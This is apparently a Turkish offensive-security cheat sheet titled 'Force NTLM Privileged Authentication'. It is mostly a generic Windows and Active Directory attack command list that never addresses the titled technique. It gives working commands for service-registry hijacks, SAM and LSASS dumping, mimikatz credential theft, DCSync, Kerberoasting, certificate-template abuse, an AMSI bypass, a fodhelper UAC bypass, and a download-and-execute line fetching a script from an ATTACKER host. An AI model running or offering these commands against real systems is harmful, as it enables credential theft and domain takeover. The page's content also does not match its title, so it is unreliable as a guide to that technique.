Force NTLM Privileged Authentication
windows ad
Force NTLM Privileged Authentication Windows privesc, credential veya yanal hareket notudur. Token/servis/DLL/AD yüzeyini haritalayıp SYSTEM veya domain etkisi doğrula. Domain’de BloodHound yolu + Kerberos/ACL/Cert zinciri birlikte okunur.
Metodoloji
Section titled “Metodoloji”-
whoami /all, priv, UAC bütünlüğü ve AV durumunu kilitle.
-
Force NTLM Privileged Authenticationiçin servis/DLL/token/AD hipotezini enum ile destekle. -
Yükseltme veya lateral PoC’yi çalıştırıp etkiyi kanıtla.
-
LSASS/SAM/DPAPI veya domain loot paketle.
Force NTLM Privileged Authentication Windows saldırı notudur. Önce token, bütünlük seviyesi, AV ve yerel grup haritasını çıkar.
whoami /allsysteminfowhoami /privnet user; net localgroup administratorshostname & ipconfig /allGet-LocalGroupMember Administrators -ErrorAction SilentlyContinueGet-MpComputerStatus | Select AMServiceEnabled,RealTimeProtectionEnablednetstat -anoGet-Service | ? Status -eq Running | Select Name,DisplayNameServis / registry ACL
Section titled “Servis / registry ACL”Yazılabilir ImagePath, service ACL veya registry AppendData klasik LPE’dir.
Get-CimInstance Win32_Service | Select Name,State,StartMode,StartName,PathName | Format-ListGet-Service | ? {$_.Status -eq 'Running'}accesschk.exe /accepteula -uwcqv Everyone *accesschk.exe /accepteula -uwcqv AuthenticatedUsers *sc qc SERVICENAMEsc sdshow SERVICENAMEreg query HKLM\SYSTEM\CurrentControlSet\Services\SERVICENAMEreg add HKLM\SYSTEM\CurrentControlSet\Services\SERVICENAME /v ImagePath /t REG_EXPAND_SZ /d "C:\temp\evil.exe" /fCredential dump
Section titled “Credential dump”Yüksek yetki sonrası SAM/LSA/DPAPI ve oturum token’ları loot edilir.
reg save HKLM\SAM C:\temp\sam.savereg save HKLM\SYSTEM C:\temp\sys.savereg save HKLM\SECURITY C:\temp\sec.saveprocdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmpmimikatz # privilege::debugmimikatz # sekurlsa::logonpasswordsmimikatz # lsadump::sam /system:sys.save /sam:sam.savemimikatz # dpapi::cred /in:"%APPDATA%\Microsoft\Credentials\*"Get-ChildItem -Force $env:USERPROFILE -Recurse -Include *.kdbx,*.rdg,*.xml,*.config -ErrorAction SilentlyContinue | Select -First 40impacket-secretsdump -sam sam.save -system sys.save LOCALActive Directory saldırı yüzeyi
Section titled “Active Directory saldırı yüzeyi”Domain enum → abuse path (Kerberos/ACL/Cert/Delegation) → DA veya hedef kaynak.
nxc ldap DC -u user -p pass --users --groups --computersimpacket-GetUserSPNs domain/user:pass -dc-ip DC -requestimpacket-GetNPUsers domain/ -usersfile users.txt -dc-ip DC -format hashcatimpacket-getST domain/user:pass -spn cifs/TARGET -impersonate Administrator -dc-ip DCimpacket-secretsdump domain/user:pass@DC -just-dccertipy find -u user@domain -p pass -dc-ip DC -vulnerable -stdoutcertipy req -u user@domain -p pass -ca CA -template ESC1 -upn administrator@domainbloodhound-python -d domain.local -u user -p pass -c All -ns DCImport-Module .\PowerView.ps1Get-DomainUser -SPN | Select samaccountname,serviceprincipalnameGet-DomainComputer | Select dnshostnameFind-LocalAdminAccess -VerboseGet-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ? ActiveDirectoryRights -match 'Write|GenericAll'UAC / bütünlük / execution
Section titled “UAC / bütünlük / execution”Medium→High UAC bypass ve AMSI/ETW kaçışı execution zincirinin parçasıdır.
whoami /groups | findstr LevelGet-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System[Environment]::OSVersion.Version[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/a.ps1')fodhelper.exe # HKCU ms-settings\shell\open\commandeventvwr.exereg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\temp\evil.exe" /fOtomatik enum
Section titled “Otomatik enum”winPEASx64.exe quietaccesschk.exe /accepteula -uwcqv users *Import-Module .\PowerUp.ps1; Invoke-AllChecksGet-ChildItem C:\ -Recurse -Include *.xml,*.config,*.ini -ErrorAction SilentlyContinue | Select-String -Pattern 'password|pwd|connectionstring' | Select -First 30Yükseltme / erişim sonrası
Section titled “Yükseltme / erişim sonrası”dir C:\Users\Administrator\Desktopdir C:\Users\*\Documents,C:\Users\*\Desktop -ErrorAction SilentlyContinueGet-ChildItem -Force C:\ -Include *.kdbx,*.pfx,*.key -Recurse -ErrorAction SilentlyContinue | Select -First 30procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmpreg save HKLM\SAM C:\temp\sam.save & reg save HKLM\SYSTEM C:\temp\sys.saveChecklist
Section titled “Checklist”[ ] whoami /priv ve gruplar alındı[ ] Servis/DLL/registry/token yüzeyi tarandı[ ] Privesc veya lateral PoC doğrulandı[ ] Credential dump / loot paketlendi[ ] Sonraki pivot not edildiNotlar
Section titled “Notlar”Force NTLM Privileged Authentication sonuçları sürüm, yapılandırma ve koruma katmanına göre değişir. Komutları hedefe göre uyarla; başarılı zinciri adım adım kaydet.